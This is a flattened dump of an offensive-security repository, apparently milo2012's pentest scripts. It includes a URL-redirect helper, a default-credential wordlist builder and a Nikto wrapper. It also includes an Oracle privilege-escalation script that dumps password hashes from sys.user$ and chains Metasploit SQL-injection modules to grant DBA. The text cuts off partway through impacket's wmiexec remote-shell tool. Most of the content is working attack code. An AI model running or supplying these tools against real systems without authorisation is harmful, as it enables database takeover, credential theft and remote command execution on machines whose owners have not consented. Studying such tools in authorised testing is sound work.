| rtnVal = (jobid,get_redirected_url(url)) 48 | self.result_queue.put(rtnVal) 49 | 50 | def execute(jobs, num_processes=2): 51 | # load up work queue 52 | work_queue = multiprocessing.Queue() 53 | for job in jobs: 54 | work_queue.put(job) 55 | 56 | # create a queue to pass to workers to store the results 57 | result_queue = multiprocessing.Queue() 58 | 59 | # spawn workers 60 | worker = [] 61 | for i in range(int(num_processes)): 62 | worker.append(Worker(work_queue, result_queue)) 63 | worker[i].start() 64 | 65 | # collect the results from the queue 66 | results = [] 67 | while len(results) < len(jobs): #Beware - if a job hangs, then the whole program will hang 68 | result = result_queue.get() 69 | results.append(result) 70 | results.sort() # The tuples in result are sorted according to the first element - the jobid 71 | return (results) 72 | 73 | 74 | if __name__ == '__main__': 75 | parser = argparse.ArgumentParser() 76 | parser.add_argument('-f', dest='filename', action='store', help='[filename containing urls]') 77 | parser.add_argument('-p', dest='projectName', action='store', help='[abbreviation of the project. do not use spaces]') 78 | parser.add_argument('-o', dest='output', action='store', help='[output cenzic CSV file]') 79 | options = parser.parse_args() 80 | 81 | if len(sys.argv)==1: 82 | parser.print_help() 83 | sys.exit(1) 84 | else: 85 | if not options.output: 86 | print "[!] Please use the -output argument." 87 | if not options.filename: 88 | print "[!] Please use the -filename argument." 89 | if options.filename and options.output and options.projectName: 90 | resultList=[] 91 | filename = options.filename 92 | lines=[] 93 | with open(filename) as filename: 94 | lines = filename.read().splitlines() 95 | jobs=[] 96 | jobid=0 97 | for line in lines: 98 | line=line.strip() 99 | print line 100 | if "#" not in line and len(line)>0: 101 | jobs.append((jobid,line)) 102 | jobid = jobid+1 103 | results = execute(jobs,int(numProcess)) 104 | for result in results: 105 | if result[1] not in resultList and result[1]!=None: 106 | if ['"'+result[1]+'"','"'+options.projectName+"_"+result[1]+'"',"","","","",'"NetPenScan"','"10/2/2014"'] not in resultList: 107 | resultList.append(['"'+result[1]+'"','"'+options.projectName+"_"+result[1]+'"',"","","","",'"NetPenScan"','"10/2/2014"']) 108 | #resultList.append(['"'+result[1]+'"','"'+options.projectName+"_"+result[1]+'"',"","","","","",'"NetPenScan"','"10/2/2014"']) 109 | if len(resultList)>0: 110 | print "\n\n************** Results **************" 111 | print "Found the below URLs" 112 | 113 | for x in resultList: 114 | print x[0] 115 | 116 | if ".csv" not in options.output: 117 | file = open(options.output+".csv", "w") 118 | for x in resultList: 119 | file.write(x[0]+','+x[1]+','+x[2]+','+x[3]+','+x[4]+','+x[5]+','+x[6]+','+x[7]+'\n') 120 | file.close() 121 | print "[*] Import "+options.output+".csv into Cenzic" 122 | else: 123 | file = open(options.output, "w") 124 | for x in resultList: 125 | file.write(x[0]+','+x[1]+','+x[2]+','+x[3]+','+x[4]+','+x[5]+','+x[6]+','+x[7]+','+'\n') 126 | file.close() 127 | print "[*] Import "+options.output+" into Cenzic" 128 | 129 | else: 130 | print "\n\n************** Results **************" 131 | print "- No URLs found" 132 | -------------------------------------------------------------------------------- /exploits/cve-2013-7331.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 |") 222 | for result in results: 223 | if "method" in result.lower(): 224 | if "telnet" in result.lower(): 225 | #print result.strip() 226 | found=True 227 | if "ssh" in result.lower(): 228 | found1=True 229 | if "multi" in result.lower(): 230 | found2=True 231 | if "http" in result.lower(): 232 | found3=True 233 | 234 | result = results[4].strip() 235 | soup = bs(result) 236 | p_tags = soup.findAll('td',text=True) 237 | try: 238 | username = p_tags[1] 239 | except IndexError: 240 | username = "" 241 | 242 | result = results[5].strip() 243 | soup = bs(result) 244 | p_tags = soup.findAll('td',text=True) 245 | try: 246 | password = p_tags[1] 247 | except IndexError: 248 | password = "" 249 | 250 | tmpStr = ":"+str(username)+":"+str(password) 251 | 252 | if found==True: 253 | if tmpStr not in telnetList: 254 | telnetList.append(tmpStr) 255 | telnetfile.write(tmpStr+"\n") 256 | found=False 257 | if found1==True: 258 | print tmpStr 259 | if tmpStr not in sshList: 260 | print tmpStr 261 | sshList.append(tmpStr) 262 | sshfile.write(tmpStr+"\n") 263 | found1=False 264 | if found2==True: 265 | if tmpStr not in telnetList: 266 | telnetList.append(tmpStr) 267 | telnetfile.write(tmpStr+"\n") 268 | found2=False 269 | if tmpStr not in sshList: 270 | sshList.append(tmpStr) 271 | sshfile.write(tmpStr+"\n") 272 | found2=False 273 | if tmpStr not in httpList: 274 | httpList.append(tmpStr) 275 | httpfile.write(tmpStr+"\n") 276 | found2=False 277 | if found3==True: 278 | if tmpStr not in httpList: 279 | httpList.append(tmpStr) 280 | httpfile.write(tmpStr+"\n") 281 | found3=False 282 | 283 | telnetfile.close() 284 | sshfile.close() 285 | httpfile.close() 286 | 287 | tempList = [] 288 | with open("wordList_telnet.txt") as f: 289 | for line in f: 290 | if line not in tempList: 291 | tempList.append(line) 292 | f=open("wordList_telnet.txt","w") 293 | for line in tempList: 294 | f.write(line) 295 | f.close() 296 | 297 | tempList = [] 298 | with open("wordList_ssh.txt") as f: 299 | for line in f: 300 | if line not in tempList: 301 | tempList.append(line) 302 | f=open("wordList_ssh.txt","w") 303 | for line in tempList: 304 | f.write(line) 305 | f.close() 306 | 307 | print "[*] Please check directory for wordList_ssh.txt, wordList_telnet.txt, wordList_http.txt, users.txt and passwords.txt" 308 | 309 | -------------------------------------------------------------------------------- /niktohelper/niktohelper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import re,sys,os,subprocess,shlex,Queue 3 | from threading import Thread 4 | import urllib2, socket,sys,base64,ssl 5 | from xml.dom.minidom import parse, parseString 6 | 7 | niktoPath = "/pentest/nikto-2.1.5/nikto.pl" 8 | #Bing Search API Account Key 9 | account_key = "" 10 | runBing = True 11 | 12 | #CA certs http://curl.haxx.se/ca/cacert.pem 13 | 14 | class Consumer(Thread): 15 | def __init__(self, queue=None): 16 | super(Consumer, self).__init__() 17 | self.daemon = True 18 | self.queue = queue 19 | def run(self): 20 | while True: 21 | cmd = self.queue.get() 22 | args = shlex.split(cmd) 23 | p = subprocess.Popen(args,stdout=subprocess.PIPE) 24 | retcode = p.wait() 25 | #p.communicate() 26 | self.queue.task_done() 27 | 28 | def isOpen(ip,port): 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | try: 31 | s.connect((ip,int(port))) 32 | s.shutdown(2) 33 | return True 34 | except: 35 | return False 36 | 37 | def getSSLCommonName(HOST,PORT): 38 | try: 39 | HOST = socket.getaddrinfo(HOST, PORT)[0][4][0] 40 | sock = socket.socket() 41 | sock.connect((HOST, PORT)) 42 | sock = ssl.wrap_socket(sock, 43 | #cert_reqs=ssl.CERT_REQUIRED, 44 | cert_reqs=ssl.CERT_OPTIONAL, 45 | #cert_reqs=ssl.CERT_NOT_REQUIRED, 46 | ca_certs="cacert.pem" 47 | ) 48 | cert = sock.getpeercert() 49 | for field in cert['subject']: 50 | if field[0][0] == 'commonName': 51 | certhost = field[0][1] 52 | return certhost 53 | except ssl.SSLError: 54 | return "" 55 | 56 | def bing(account_key,ip): 57 | if(isinstance(ip,list)): 58 | for count in ip: 59 | count = count.strip() 60 | sites = [] 61 | skip = 0 62 | top = 50 63 | while skip < 200: 64 | url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"% (count,top,skip) 65 | request = urllib2.Request(url) 66 | auth = base64.encodestring("%s:%s" % (account_key, account_key)).replace("\n", "") 67 | request.add_header("Authorization", "Basic %s" % auth) 68 | res = urllib2.urlopen(request) 69 | data = res.read() 70 | 71 | tempDomainList = [] 72 | xmldoc = parseString(data) 73 | site_list = xmldoc.getElementsByTagName('d:Url') 74 | for site in site_list: 75 | domain = site.childNodes[0].nodeValue 76 | domain = domain.split("/")[2] 77 | if domain not in sites: 78 | if domain not in tempDomainList: 79 | tempDomainList.append(domain) 80 | #sites.append(domain) 81 | count = 1 82 | if len(tempDomainList)>1: 83 | for i in tempDomainList: 84 | print "("+str(count)+")\t"+i 85 | count+=1 86 | #print tempDomainList 87 | print "[*] Enter the number followed by comma E.g. 1, 4, 10" 88 | print "[*] To select all, key in 'ALL'. Leave it blank or key in 'NONE' to ignore all." 89 | listInput = raw_input() 90 | listInput = listInput.strip() 91 | listInput = listInput.lower() 92 | if len(listInput)>0: 93 | if listInput == "all" and listInput != "none": 94 | for x in tempDomainList: 95 | sites.append(x) 96 | elif listInput != "all" and listInput != "none": 97 | inputList = listInput.split(",") 98 | for x in inputList: 99 | print tempDomainList[int(x)-1] 100 | sites.append(tempDomainList[int(x)-1]) 101 | skip += 50 102 | 103 | if(len(sites)==0): 104 | if isOpen(count,443): 105 | commonName="" 106 | commonName=getSSLCommonName(count,443) 107 | if(len(commonName)>0): 108 | sites.append(commonName) 109 | return sites 110 | 111 | elif(isinstance(ip,str)): 112 | sites = [] 113 | skip = 0 114 | top = 50 115 | while skip < 200: 116 | url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"% (ip,top,skip) 117 | request = urllib2.Request(url) 118 | auth = base64.encodestring("%s:%s" % (account_key, account_key)).replace("\n", "") 119 | request.add_header("Authorization", "Basic %s" % auth) 120 | res = urllib2.urlopen(request) 121 | data = res.read() 122 | 123 | xmldoc = parseString(data) 124 | site_list = xmldoc.getElementsByTagName('d:Url') 125 | tempDomainList = [] 126 | for site in site_list: 127 | domain = site.childNodes[0].nodeValue 128 | domain = domain.split("/")[2] 129 | if domain not in sites: 130 | if domain not in tempDomainList: 131 | tempDomainList.append(domain) 132 | #sites.append(domain) 133 | count = 1 134 | if len(tempDomainList)>1: 135 | for i in tempDomainList: 136 | print "("+str(count)+")\t"+i 137 | count+=1 138 | print "[*] Enter the number followed by comma E.g. 1, 4, 10" 139 | print "[*] To select all, key in 'ALL'. Leave it blank or key in 'NONE' to ignore all." 140 | listInput = raw_input() 141 | listInput = listInput.strip() 142 | listInput = listInput.lower() 143 | if len(listInput)>0: 144 | if listInput == "all" and listInput != "none": 145 | for x in tempDomainList: 146 | sites.append(x) 147 | elif listInput != "all" and listInput != "none": 148 | inputList = listInput.split(",") 149 | for x in inputList: 150 | print tempDomainList[int(x)-1] 151 | sites.append(tempDomainList[int(x)-1]) 152 | 153 | #if len(tempDomainList)>1: 154 | # print tempDomainList 155 | skip += 50 156 | if(len(sites)==0): 157 | if isOpen(ip,443): 158 | commonName="" 159 | commonName=getSSLCommonName(ip,443) 160 | if(len(commonName)>0): 161 | sites.append(commonName) 162 | return sites 163 | 164 | def parseNmap(fname,child,displayOnly): 165 | queue = Queue.Queue() 166 | ipList = [] 167 | with open(fname) as f: 168 | count=0 169 | content = f.readlines() 170 | for i in content: 171 | count+=1 172 | if(count>2): 173 | i = i.strip() 174 | if 'http' in i: 175 | result = re.search('Host:(.*)\(\)', i) 176 | host = result.group(1).strip() 177 | if host not in ipList: 178 | ipList.append(host) 179 | #Perform a reverse DNS lookup on Bing.com 180 | sites = [] 181 | global runBing 182 | if runBing==True: 183 | try: 184 | sites = bing(account_key,host) 185 | except urllib2.HTTPError: 186 | print "[*] Please check your Bing API Key" 187 | sys.exit(0) 188 | if len(sites)>0: 189 | for site in sites: 190 | strStart = i.index('Ports: ')+7 191 | strEnd = len(i) 192 | portString = i[strStart:strEnd] 193 | portStringList = portString.split(",") 194 | for port in portStringList: 195 | portNo = port.split("/")[0].strip() 196 | if "ssl|http" in port: 197 | if "open" in port: 198 | currentDir = os.getcwd() 199 | savePath = currentDir+"/nikto-"+host+"-port"+portNo+"-"+site+".txt" 200 | cmd = "/usr/bin/perl "+niktoPath+" -vhost "+site+" -maxtime 7200 -Cgidirs all -ssl -host "+host+" -port "+portNo+" -output "+savePath 201 | print cmd 202 | queue.put(cmd) 203 | elif "http" in port: 204 | if "open" in port: 205 | currentDir = os.getcwd() 206 | savePath = currentDir+"/nikto-"+host+"-port"+portNo+"-"+site+".txt" 207 | cmd = "/usr/bin/perl "+niktoPath+" -vhost "+site+" -maxtime 7200 -Cgidirs all -host "+host+" -port "+portNo+" -output "+savePath 208 | print cmd 209 | queue.put(cmd) 210 | else: 211 | strStart = i.index('Ports: ')+7 212 | strEnd = len(i) 213 | portString = i[strStart:strEnd] 214 | portStringList = portString.split(",") 215 | for port in portStringList: 216 | currentDir = os.getcwd() 217 | portNo = port.split("/")[0].strip() 218 | savePath = currentDir+"/nikto-"+host+"-port"+portNo+".txt" 219 | if "ssl|http" in port: 220 | if "open" in port: 221 | cmd = "/usr/bin/perl "+niktoPath+" -maxtime 7200 -Cgidirs all -ssl -host "+host+" -port "+portNo+" -output "+savePath 222 | print cmd 223 | queue.put(cmd) 224 | elif "http" in port: 225 | if "open" in port: 226 | cmd = "/usr/bin/perl "+niktoPath+" -maxtime 7200 -Cgidirs all -host "+host+" -port "+portNo+" -output "+savePath 227 | print cmd 228 | queue.put(cmd) 229 | if displayOnly==False: 230 | for i in range(int(child)): 231 | consumer = Consumer(queue) 232 | consumer.start() 233 | queue.join() 234 | 235 | def options(arguments): 236 | count = 0 237 | child = 0 238 | displayOnly = False 239 | filename = "" 240 | for arg in arguments: 241 | if arg == "-child": 242 | child = arguments[count+1] 243 | if arg == "-file": 244 | filename = arguments[count+1] 245 | if arg == "-nobing": 246 | global runBing 247 | runBing = False 248 | if arg == "-display": 249 | displayOnly = True 250 | count+=1 251 | print filename 252 | parseNmap(filename,child,displayOnly) 253 | 254 | def showhelp(): 255 | print """ 256 | ##################################################### 257 | # niktoHelper.py # 258 | # Run Nikto against http/https services in .gnmap # 259 | # visit milo2012.wordpress.com # 260 | ##################################################### 261 | Usage: python niktoHelper.py [OPTIONS] 262 | 263 | [OPTIONS] 264 | 265 | -file [Nmap .gnmap File] 266 | -child [Num of Threads] 267 | -nobing [Do not run Bing reverse IP] 268 | -display[Print only to screen. Do not run Nikto] 269 | """ 270 | 271 | if __name__ == '__main__': 272 | if len(sys.argv) <= 2: 273 | showhelp() 274 | sys.exit() 275 | else: 276 | options(sys.argv) 277 | -------------------------------------------------------------------------------- /oracle_pillage/ora_priv.py: -------------------------------------------------------------------------------- 1 | import time 2 | import sys 3 | import csv 4 | import re 5 | import argparse 6 | import urllib 7 | import os.path 8 | import fileinput 9 | import subprocess 10 | import socket 11 | import os 12 | import itertools 13 | from collections import defaultdict 14 | from pprint import pprint 15 | from termcolor import colored 16 | from subprocess import call 17 | 18 | sid = "" 19 | metasploitPath = "" 20 | #metasploitPath = "/pentest/metasploit-framework/" 21 | 22 | # Made by Keith Lee 23 | # http://milo2012.wordpress.com 24 | # @keith55 25 | 26 | try: 27 | import cx_Oracle 28 | except ImportError: 29 | print "[!] Please install cx_Oracle" 30 | sys.exit() 31 | 32 | def msfPrivEscUnknown(username,password,hostname,sid): 33 | outputMsfFile = "msfresource.rc" 34 | myfile = open(outputMsfFile, "w") 35 | 36 | stmt = "setg DBUSER "+username+"\n" 37 | stmt += "setg DBPASS "+password+"\n" 38 | stmt += "setg SQL grant dba to "+username+"\n" 39 | stmt += "setg SID "+sid+"\n" 40 | stmt += "setg RHOST "+hostname+"\n" 41 | myfile.write(stmt) 42 | 43 | #Last Attempts 44 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish2\n") 45 | myfile.write("exploit\n") 46 | myfile.write("sleep 3\n") 47 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish3\n") 48 | myfile.write("exploit\n") 49 | myfile.write("sleep 3\n") 50 | myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml\n") 51 | myfile.write("exploit\n") 52 | myfile.write("sleep 3\n") 53 | myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_xml\n") 54 | myfile.write("exploit\n") 55 | myfile.write("sleep 3\n") 56 | myfile.write("use auxiliary/sqli/oracle/dbms_metadata_open\n") 57 | myfile.write("exploit\n") 58 | myfile.write("sleep 3\n") 59 | myfile.write("use auxiliary/sqli/oracle/droptable_trigger\n") 60 | myfile.write("exploit\n") 61 | myfile.write("sleep 3\n") 62 | myfile.write("use auxiliary/sqli/oracle/lt_compressworkspace\n") 63 | myfile.write("exploit\n") 64 | myfile.write("sleep 3\n") 65 | myfile.write("use auxiliary/sqli/oracle/lt_mergeworkspace\n") 66 | myfile.write("exploit\n") 67 | myfile.write("sleep 3\n") 68 | myfile.write("use auxiliary/sqli/oracle/lt_removeworkspace\n") 69 | myfile.write("exploit\n") 70 | myfile.write("sleep 3\n") 71 | myfile.write("use auxiliary/sqli/oracle/lt_rollbackworkspace\n") 72 | myfile.write("exploit\n") 73 | myfile.write("sleep 3\n") 74 | myfile.write("exit\n") 75 | myfile.close() 76 | command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" 77 | print command 78 | call(command, shell=True) 79 | 80 | def msfPrivEsc(username,password,hostname,sid): 81 | #Check version before doing privilege escalation 82 | """ 83 | orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 84 | curs = orcl1.cursor() 85 | curs.execute("select * from v$version") 86 | row = curs.fetchone() 87 | curs.close() 88 | oracleVer = str(row) 89 | """ 90 | oracleVer = "10.1" 91 | 92 | outputMsfFile = "msfresource.rc" 93 | myfile = open(outputMsfFile, "w") 94 | 95 | stmt = "setg DBUSER "+username+"\n" 96 | stmt += "setg DBPASS "+password+"\n" 97 | stmt += "setg SQL grant dba to "+username+"\n" 98 | stmt += "setg SID "+sid+"\n" 99 | stmt += "setg RHOST "+hostname+"\n" 100 | 101 | myfile.write(stmt) 102 | 103 | #if "9.0" in str(row) or "10.1" in str(row) or "10.2" in str(row): 104 | if "9.0" in oracleVer: 105 | myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") 106 | myfile.write("exploit\n") 107 | myfile.write("sleep 3\n") 108 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") 109 | myfile.write("exploit\n") 110 | myfile.write("sleep 3\n") 111 | 112 | if "9.0" in oracleVer: 113 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") 114 | myfile.write("exploit\n") 115 | myfile.write("sleep 3\n") 116 | 117 | if "10.1" in oracleVer: 118 | myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") 119 | myfile.write("exploit\n") 120 | myfile.write("sleep 3\n") 121 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") 122 | myfile.write("sleep 3\n") 123 | myfile.write("exploit\n") 124 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") 125 | myfile.write("exploit\n") 126 | myfile.write("sleep 3\n") 127 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") 128 | myfile.write("sleep 3\n") 129 | myfile.write("exploit\n") 130 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 131 | myfile.write("sleep 3\n") 132 | myfile.write("exploit\n") 133 | 134 | if "10.2" in oracleVer: 135 | myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") 136 | myfile.write("sleep 3\n") 137 | myfile.write("exploit\n") 138 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") 139 | myfile.write("sleep 3\n") 140 | myfile.write("exploit\n") 141 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") 142 | myfile.write("sleep 3\n") 143 | myfile.write("exploit\n") 144 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") 145 | myfile.write("sleep 3\n") 146 | myfile.write("exploit\n") 147 | 148 | if "11.0" in oracleVer: 149 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 150 | myfile.write("sleep 3\n") 151 | myfile.write("exploit\n") 152 | 153 | if "11.1" in oracleVer: 154 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") 155 | myfile.write("sleep 3\n") 156 | myfile.write("exploit\n") 157 | myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") 158 | myfile.write("sleep 3\n") 159 | myfile.write("exploit\n") 160 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") 161 | myfile.write("sleep 3\n") 162 | myfile.write("exploit\n") 163 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") 164 | myfile.write("sleep 3\n") 165 | myfile.write("exploit\n") 166 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 167 | myfile.write("sleep 3\n") 168 | myfile.write("exploit\n") 169 | 170 | if "11.2" in oracleVer: 171 | myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") 172 | myfile.write("sleep 3\n") 173 | myfile.write("exploit\n") 174 | myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") 175 | myfile.write("sleep 3\n") 176 | myfile.write("exploit\n") 177 | myfile.write("exit\n") 178 | myfile.close() 179 | command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" 180 | print command 181 | call(command, shell=True) 182 | 183 | def dumpHashes(username,password,hostname,sid): 184 | orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) 185 | curs = orcl.cursor() 186 | curs.execute("SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'") 187 | test1 = curs.fetchall() 188 | print colored("\n[+] Below are the password hashes for SID: "+sid+".","red",attrs=['bold']) 189 | for i in test1: 190 | print i 191 | curs.close() 192 | 193 | def checkPermissions(username,password,hostname,sid,firstRun): 194 | try: 195 | orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) 196 | curs = orcl.cursor() 197 | curs.execute("select * from v$database") #Get a list of all databases 198 | curs.close() 199 | print colored(str("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Success)"),"red",attrs=['bold']) 200 | dumpHashes(username,password,hostname,sid) 201 | return True 202 | except cx_Oracle.DatabaseError as e: 203 | error, = e.args 204 | if error.code == 1017: 205 | print "[-] Testing: "+username.strip()+"/"+password.strip()+". (Fail)" 206 | sys.exit() 207 | if error.code == 942: 208 | if firstRun==True: 209 | print colored("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Insufficient Privileges). Trying to escalate privileges.","red",attrs=['bold']) 210 | return False 211 | 212 | if __name__=="__main__": 213 | parser = argparse.ArgumentParser(description='Oracle Privilege Escalation') 214 | parser.add_argument('-host', help='IP or host name of Oracle server') 215 | parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers') 216 | parser.add_argument('-u', dest='username', help='Use this username to authenticate') 217 | parser.add_argument('-p', dest='password', help='Use this password to authenticate') 218 | parser.add_argument('-sid', dest='sid', help='Use this sid') 219 | args = vars(parser.parse_args()) 220 | 221 | hostList = [] 222 | counter=0 223 | 224 | if args['host']!=None: 225 | counter+=1 226 | 227 | if args['hostFile']!=None: 228 | counter+=1 229 | 230 | if args['hostFile']!=None and args['host']==None: 231 | for line in open(args['hostFile'],'r'): 232 | hostList.append(line.strip()) 233 | 234 | if args['host']!=None and args['hostFile']==None: 235 | hostList.append(args['host']) 236 | 237 | if counter==0 or counter>1: 238 | print colored("[+] Please use either -host or -hostFile.","red",attrs=['bold']) 239 | sys.exit(0) 240 | 241 | if args['sid']!=None: 242 | sid = args['sid'] 243 | 244 | #Check if username/password is provided in the command line 245 | credCount=0 246 | 247 | if args['username']!=None: 248 | credCount+=1 249 | if args['password']!=None: 250 | credCount+=1 251 | if credCount>1 and credCount<2: 252 | print "[!] You need to provide both -u and -p." 253 | sys.exit(0) 254 | 255 | #Load hostname 256 | for hostname in hostList: 257 | if len(hostname)<1: 258 | sys.exit(0) 259 | 260 | socketAvail = False 261 | try: 262 | socket.setdefaulttimeout(2) 263 | s = socket.socket() 264 | s.connect((hostname,1521)) 265 | socketAvail=True 266 | print "[+] Connected to "+hostname+":1521" 267 | except: 268 | print "[-] Cannot connect to "+hostname+":1521" 269 | 270 | if socketAvail==True: 271 | username = args['username'] 272 | password = args['password'] 273 | print "[+] [SID:"+sid+"] Testing accounts. " 274 | if checkPermissions(username,password,hostname,sid,firstRun=True)==False: 275 | print colored("[+] Attempting Metasploit Oracle SQL Privilege Escalation","red",attrs=['bold']) 276 | msfPrivEsc(username,password,hostname,sid) 277 | if checkPermissions(username,password,hostname,sid,firstRun=False)==False: 278 | print colored("[+] Attempting Addition Oracle SQL Privilege Escalation","red",attrs=['bold']) 279 | msfPrivEscUnknown(username,password,hostname,sid) 280 | if checkPermissions(username,password,hostname,sid,firstRun=False)==False: 281 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Unable to Escalate to DBA)","red",attrs=['bold']) 282 | else: 283 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) 284 | else: 285 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) 286 | else: 287 | print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) 288 | -------------------------------------------------------------------------------- /impacket/wmiexec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Copyright (c) 2003-2014 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # $Id$ 9 | # 10 | # A similar approach to smbexec but executing commands through WMI. 11 | # Main advantage here is it runs under the user (has to be Admin) 12 | # account, not SYSTEM, plus, it doesn't generate noisy messages 13 | # in the event log that smbexec.py does when creating a service. 14 | # Drawback is it needs DCOM, hence, I have to be able to access 15 | # DCOM ports at the target machine. 16 | # 17 | # Author: 18 | # beto (bethus@gmail.com) 19 | # 20 | # Reference for: 21 | # DCOM 22 | # 23 | 24 | import sys 25 | import os 26 | import cmd 27 | import argparse 28 | import time 29 | import ntpath 30 | 31 | from impacket import version, ntlm 32 | from impacket.smbconnection import * 33 | from impacket.dcerpc.v5.dcomrt import DCOMConnection 34 | from impacket.dcerpc.v5.dcom import wmi 35 | from impacket.dcerpc.v5.dtypes import NULL 36 | 37 | OUTPUT_FILENAME = '__' 38 | 39 | 40 | class WMIEXEC: 41 | def __init__(self, command='', username='', password='', domain='', hashes=None, share=None, noOutput=False): 42 | self.__command = command 43 | self.__username = username 44 | self.__password = password 45 | self.__domain = domain 46 | self.__lmhash = '' 47 | self.__nthash = '' 48 | self.__share = share 49 | self.__noOutput = noOutput 50 | if hashes is not None: 51 | self.__lmhash, self.__nthash = hashes.split(':') 52 | 53 | def run(self, addr): 54 | if self.__noOutput is False: 55 | smbConnection = SMBConnection(addr, addr) 56 | smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) 57 | dialect = smbConnection.getDialect() 58 | if dialect == SMB_DIALECT: 59 | print("[*] SMBv1 dialect used") 60 | elif dialect == SMB2_DIALECT_002: 61 | print("[*] SMBv2.0 dialect used") 62 | elif dialect == SMB2_DIALECT_21: 63 | print("[*] SMBv2.1 dialect used") 64 | else: 65 | print("[*] SMBv3.0 dialect used") 66 | else: 67 | smbConnection = None 68 | 69 | dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, oxidResolver=True) 70 | 71 | iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) 72 | iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) 73 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 74 | iWbemLevel1Login.RemRelease() 75 | 76 | win32Process, _ = iWbemServices.GetObject('Win32_Process') 77 | 78 | try: 79 | self.shell = RemoteShell(self.__share, win32Process, smbConnection) 80 | if self.__command != ' ': 81 | self.shell.onecmd(self.__command) 82 | else: 83 | self.shell.cmdloop() 84 | except (Exception, KeyboardInterrupt), e: 85 | #import traceback 86 | #traceback.print_exc() 87 | print e 88 | if smbConnection is not None: 89 | smbConnection.logoff() 90 | dcom.disconnect() 91 | sys.stdout.flush() 92 | sys.exit(1) 93 | 94 | if smbConnection is not None: 95 | smbConnection.logoff() 96 | dcom.disconnect() 97 | 98 | 99 | class RemoteShell(cmd.Cmd): 100 | def __init__(self, share, win32Process, smbConnection): 101 | cmd.Cmd.__init__(self) 102 | self.__share = share 103 | self.__output = '\\' + OUTPUT_FILENAME 104 | self.__outputBuffer = '' 105 | self.__shell = 'cmd.exe /Q /c ' 106 | self.__win32Process = win32Process 107 | self.__transferClient = smbConnection 108 | self.__pwd = 'C:\\' 109 | self.__noOutput = False 110 | self.intro = '[!] Launching semi-interactive shell - Careful what you execute' 111 | 112 | # We don't wanna deal with timeouts from now on. 113 | if self.__transferClient is not None: 114 | self.__transferClient.setTimeout(100000) 115 | self.do_cd('\\') 116 | else: 117 | self.__noOutput = True 118 | 119 | def do_shell(self, s): 120 | os.system(s) 121 | 122 | def do_exit(self, s): 123 | return True 124 | 125 | def emptyline(self): 126 | return False 127 | 128 | def do_cd(self, s): 129 | self.execute_remote('cd ' + s) 130 | if len(self.__outputBuffer.strip('\r\n')) > 0: 131 | print self.__outputBuffer 132 | self.__outputBuffer = '' 133 | else: 134 | self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s)) 135 | self.execute_remote('cd ') 136 | self.__pwd = self.__outputBuffer.strip('\r\n') 137 | self.prompt = self.__pwd + '>' 138 | self.__outputBuffer = '' 139 | 140 | def default(self, line): 141 | # Let's try to guess if the user is trying to change drive 142 | if len(line) == 2 and line[1] == ':': 143 | # Execute the command and see if the drive is valid 144 | self.execute_remote(line) 145 | if len(self.__outputBuffer.strip('\r\n')) > 0: 146 | # 